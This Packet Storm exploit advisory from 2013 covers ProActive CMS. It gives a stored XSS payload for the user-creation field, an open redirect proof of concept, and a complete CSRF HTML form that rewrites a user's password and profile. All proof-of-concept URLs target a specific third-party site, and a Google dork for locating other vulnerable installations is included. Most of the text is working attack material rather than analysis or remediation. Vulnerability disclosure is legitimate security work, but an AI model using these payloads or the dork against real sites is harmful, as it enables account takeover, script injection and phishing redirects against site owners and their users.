ProActive CMS XSS / CSRF / Open Redirect

2013-01-15T00:00:00
ID PACKETSTORM:119542
Type packetstorm
Reporter Rafay Baloch
Modified 2013-01-15T00:00:00

Description

                                        
                                            `# Exploit Title: ProActive CMS Multiple Vulnerabilities  
# Google Dork: intext:"Powered by Proactive CMS"  
# Exploit Author: Rafay Baloch  
# Vendor Homepage: http://www.proactivecms.com  
# Tested on: Linux  
  
  
Stored Cross Site Scripting:  
  
http://professional.inbusiness.com.au/admin.php?action=newuser  
  
  
Insert Your Payload:  
"><img src=x onerror=prompt(0);>  
  
  
The newuser field does not properly sanitize the input, resulting in a  
Stored  
XSS.  
  
  
An Open redirect issue also found:  
  
POC:  
  
http://professional.inbusiness.com.au/admin.php?action=http://rafayhackingarticles.net  
  
Just, replace http://rafayhackingarticles.net with your own domain.  
  
  
Missing CSRF Tokens:  
  
  
Most of the forms are missing with CSRF tokens, To be honest one of the  
most insecure  
cms i have ever seen.  
  
http://professional.inbusiness.com.au/admin.php?action=edituser&id=24  
  
The following POC, could be altered to use it to alter a user's detail.  
  
<html>  
<body>  
<form action="  
http://professional.inbusiness.com.au/admin.php?action=saveuser&id=24"  
method="POST">  
<input type="hidden" name="groupreadvalue" value="" />  
<input type="hidden" name="groupreadallvalue" value="" />  
<input type="hidden" name="id" value="24" />  
<input type="hidden" name="password1" value="tony123" />  
<input type="hidden" name="firstname" value="Tony" />  
<input type="hidden" name="description" value="" />  
<input type="hidden" name="initials" value="V" />  
<input type="hidden" name="description" value="" />  
<input type="hidden" name="lastname" value="Badger" />  
<input type="hidden" name="description" value="" />  
<input type="hidden" name="title" value="" />  
<input type="hidden" name="description" value="" />  
<input type="hidden" name="dob" value="" />  
<input type="hidden" name="description" value="" />  
<input type="hidden" name="email"  
value="tony.badger@sales.fake.com" />  
<input type="hidden" name="description" value="" />  
<input type="hidden" name="telephone" value="+13" />  
<input type="hidden" name="description" value="" />  
<input type="hidden" name="mobile" value="" />  
<input type="hidden" name="description" value="" />  
<input type="hidden" name="fax" value="" />  
<input type="hidden" name="description" value="" />  
<input type="hidden" name="url" value="" />  
<input type="hidden" name="description" value="" />  
<input type="hidden" name="address" value="" />  
<input type="hidden" name="description" value="" />  
<input type="hidden" name="suburb" value="" />  
<input type="hidden" name="description" value="" />  
<input type="hidden" name="postcode" value="" />  
<input type="hidden" name="description" value="" />  
<input type="hidden" name="state" value="" />  
<input type="hidden" name="description" value="" />  
<input type="hidden" name="country" value="" />  
<input type="hidden" name="description" value="" />  
<input type="hidden" name="business_name" value="" />  
<input type="hidden" name="description" value="" />  
<input type="hidden" name="division" value="" />  
<input type="hidden" name="description" value="" />  
<input type="hidden" name="position" value="" />  
<input type="hidden" name="description" value="" />  
<input type="hidden" name="building" value="" />  
<input type="hidden" name="description" value="" />  
<input type="hidden" name="x" value="30" />  
<input type="hidden" name="y" value="10" />  
<input type="hidden" name="groupReadList" value=",Sales" />  
<input type="submit" value="Submit form" />  
</form>  
</body>  
</html>  
  
RHA:  
  
http://rafayhackingarticles.net  
http://twitter.com/rafaybaloch  
`